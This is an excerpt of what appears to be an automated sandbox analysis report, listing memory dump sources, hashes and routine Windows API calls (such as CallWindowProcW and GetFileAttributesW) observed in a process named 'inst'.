                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 45cdfdfc69a49756c9f584941d2135743586c45e4dc68a35265639c0e73eb094
                                                                                                                                                                                                                      • Instruction ID: f9b2fc2845841eab3806b7f1cf47cca720036aff056d2e481001d29434b9b2e4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 45cdfdfc69a49756c9f584941d2135743586c45e4dc68a35265639c0e73eb094
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 76D05EB15081108EEB408E65FC487C233A8EB80319F5444A9F440DA101E3325882C684
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 5083a290a263e700e36547145616b684de532ba0edb80cf291996e1fcf5d21b1
                                                                                                                                                                                                                      • Instruction ID: 38ee75111b15e77e86dc8e07b80ce8ec154be56a55cc43eef2586bff6c0d1ca5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5083a290a263e700e36547145616b684de532ba0edb80cf291996e1fcf5d21b1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 59D05EB11042108EDB104F64BC08BC27399FB41316F5144BDE444C6000E33298829680
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00ADD47F
                                                                                                                                                                                                                        • Part of subcall function 00AE2080: InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,00ADEAA4,?,?,00100000,00000000,0000008C), ref: 00AE20EE
                                                                                                                                                                                                                        • Part of subcall function 00AE44E3: __EH_prolog3.LIBCMT ref: 00AE44EA
                                                                                                                                                                                                                        • Part of subcall function 00AE20FB: DeleteCriticalSection.KERNEL32(?,?,00000000,00ADEB0B,?,?,?,00100000,00000000,0000008C), ref: 00AE210D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalH_prolog3Section$DeleteInitialize
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 950624297-0
                                                                                                                                                                                                                      • Opcode ID: ab01291c5dffa5c2a309aa363bcd1cadbbf95488d73a5bab1f791471a9c64ab9
                                                                                                                                                                                                                      • Instruction ID: 3bab83abd8dddcfd6316a71a019cc4909f64d20567d4bc9ba0b4e06dd709eb80
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ab01291c5dffa5c2a309aa363bcd1cadbbf95488d73a5bab1f791471a9c64ab9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7AE0EC359005589BCB15EBF4CA52BDCB775AF10311F608254F212AB1D5DF385F49DB48
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GdipBitmapLockBits.GDIPLUS(?,?,?,?,?), ref: 00ABB440
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: BitmapBitsGdipLock
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2574020740-0
                                                                                                                                                                                                                      • Opcode ID: 78855c32984809d62a231fe8d2a6a77fe25221922e89fb3875c21b092380d81e
                                                                                                                                                                                                                      • Instruction ID: e3a569d9a302a58c84f9af96e538266d5baa1cc351a09a73523176dda0765f47
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 78855c32984809d62a231fe8d2a6a77fe25221922e89fb3875c21b092380d81e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1D09E32018616AE9B219F51EF01897BAE6EF44750F004C19B99661526D7A1DC24EB73
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00A8DEBA
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                      • Opcode ID: 361a970fadd43ff9dca62f3543a01c3a01cdcdec2138553d44149098f840ac18
                                                                                                                                                                                                                      • Instruction ID: d6cdd2c4388fc03083d7bad2afadf89abe2d47a10488ff8514d33195b3963402
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 361a970fadd43ff9dca62f3543a01c3a01cdcdec2138553d44149098f840ac18
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D9C08C32221000074E5026359D020A633D1DA52B32FA04F54F0A1C70E5CB20880A2A00
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • PostMessageW.USER32(?,0000066D,?,00000000), ref: 00ACD22B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessagePost
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 410705778-0
                                                                                                                                                                                                                      • Opcode ID: d3cb3b71712a411933440ebb91b7b23fbf7b4572a6312cf7da4254ff615ea902
                                                                                                                                                                                                                      • Instruction ID: 95cfd6a714bdd93f0fec7f31ce5114a155d434c28d6b37516c41e6dab6cb7660
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d3cb3b71712a411933440ebb91b7b23fbf7b4572a6312cf7da4254ff615ea902
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C6D0C970A40300EFE7108B82DD09F227BA5B75070AF008169F5099B0A0C7B79C61DB15
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • PostMessageW.USER32(?,0000066D,?,00000000), ref: 00ACD22B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessagePost
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 410705778-0
                                                                                                                                                                                                                      • Opcode ID: 7d9cb7b41752f2613b7ebaf3cae0a1994351a303bbcd043a078d17ee4494ceb0
                                                                                                                                                                                                                      • Instruction ID: 8fee94f93120da89439990a733717ce2e37b4c176650d84356a04fd6a8d0f547
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d9cb7b41752f2613b7ebaf3cae0a1994351a303bbcd043a078d17ee4494ceb0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F2D0C9B1A04300AFE7008F51DD05F297FA5AB61709F108099F9499A0A1D7B7D821D716
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(00000002,00AA8D5A,00000000,?,00AE6919,FFFFFEE2,00000002,?,00000000,00000000,00000748,00AE6A2D,?,00000000,00000000), ref: 00AE6B71
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                                                                      • Opcode ID: 3db23da3a5e2015eb198254020c05138d5aa4751543f8d722f030ccfe44b8372
                                                                                                                                                                                                                      • Instruction ID: 0ff4d3e2c13ac8f5781121333e51343b9328d954b5e14ae905b48d53365b8996
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3db23da3a5e2015eb198254020c05138d5aa4751543f8d722f030ccfe44b8372
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 49C01231444240BADA115B22CD01F5D7F717B607A4F10CE14B174D60F0DB32C4219705
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __wfsopen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 197181222-0
                                                                                                                                                                                                                      • Opcode ID: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                                                                                                                                                                      • Instruction ID: 7aac97b186b544510e35b55cea925ff03111d8c726e54288d62244df04cba276
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 77C092B248420C77CF111A82EC06E8A3F1A9BD1664F058020FB1C19660AA73EA65969D
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __wfsopen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 197181222-0
                                                                                                                                                                                                                      • Opcode ID: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                                                                                                                                                                      • Instruction ID: ba29dda14392df80600acd3ddc95fad378799943a7c5818d449ceb4c316b6b73
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 76C09BB244010C77CF111DC2DC02E553F1997D4760F048010FB1C1D161E573E5619685
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000080), ref: 00A93D18
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                      • Opcode ID: 3a3c98170e37c8f10da7cfd875c8e93a3e4ebf006fa035c38f663eeaf8d17b32
                                                                                                                                                                                                                      • Instruction ID: 3e7cd62d093dd9495e7d47ef99e071be56b482c40fb86b2f48413bad36d52706
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3a3c98170e37c8f10da7cfd875c8e93a3e4ebf006fa035c38f663eeaf8d17b32
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4DC00236440108BBDF525F90EC05F9E3F26BB54751F048015FA5849071DB3296B5EB84
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __read
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1330306528-0
                                                                                                                                                                                                                      • Opcode ID: 627988362cf98099db0abecbe1b77d65a3d091794f3f46832c121beea6ab4c39
                                                                                                                                                                                                                      • Instruction ID: b39b9767b02462dc82f55156bd4cbaa1ad48ecd7f09bd757121ff3870bb592b6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 627988362cf98099db0abecbe1b77d65a3d091794f3f46832c121beea6ab4c39
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C4C08C3A809200BFC7034790BC01A1ABB61ABA1310F04C81AF9D800022EA3A4578E753
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CallWindowProcW.USER32(6C639C7E,00000000,?,?,?), ref: 6C5D847C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CallProcWindow
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2714655100-0
                                                                                                                                                                                                                      • Opcode ID: 02e6ae1682a9d5b390b007635724fe5e4fce76dba42f11ad6b198d11b60600cd
                                                                                                                                                                                                                      • Instruction ID: b06775521f38b7b1d133313d2ea88b6650349ffcaa49ee4cc15aef15a38e616a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 02e6ae1682a9d5b390b007635724fe5e4fce76dba42f11ad6b198d11b60600cd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E0C0013B018200FFCF024B80CA04C0ABFB2BB99326F10C848B2A90803183338032EF06
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 00AB5E36
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CallProcWindow
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2714655100-0
                                                                                                                                                                                                                      • Opcode ID: 7586a20e366f33f00cc39a01c86795088c6386edc7a04221dde5665bb216c95d
                                                                                                                                                                                                                      • Instruction ID: eea3f1f600f57e6be839ff3324e32955c5b0d44ddec7c8ef99e88bc83afa443c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7586a20e366f33f00cc39a01c86795088c6386edc7a04221dde5665bb216c95d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0FC0013A018200FFCA024B80CD04D0ABFB2BBA8325B10C858B2A848031C733C032EB02
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 00AC2E30
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
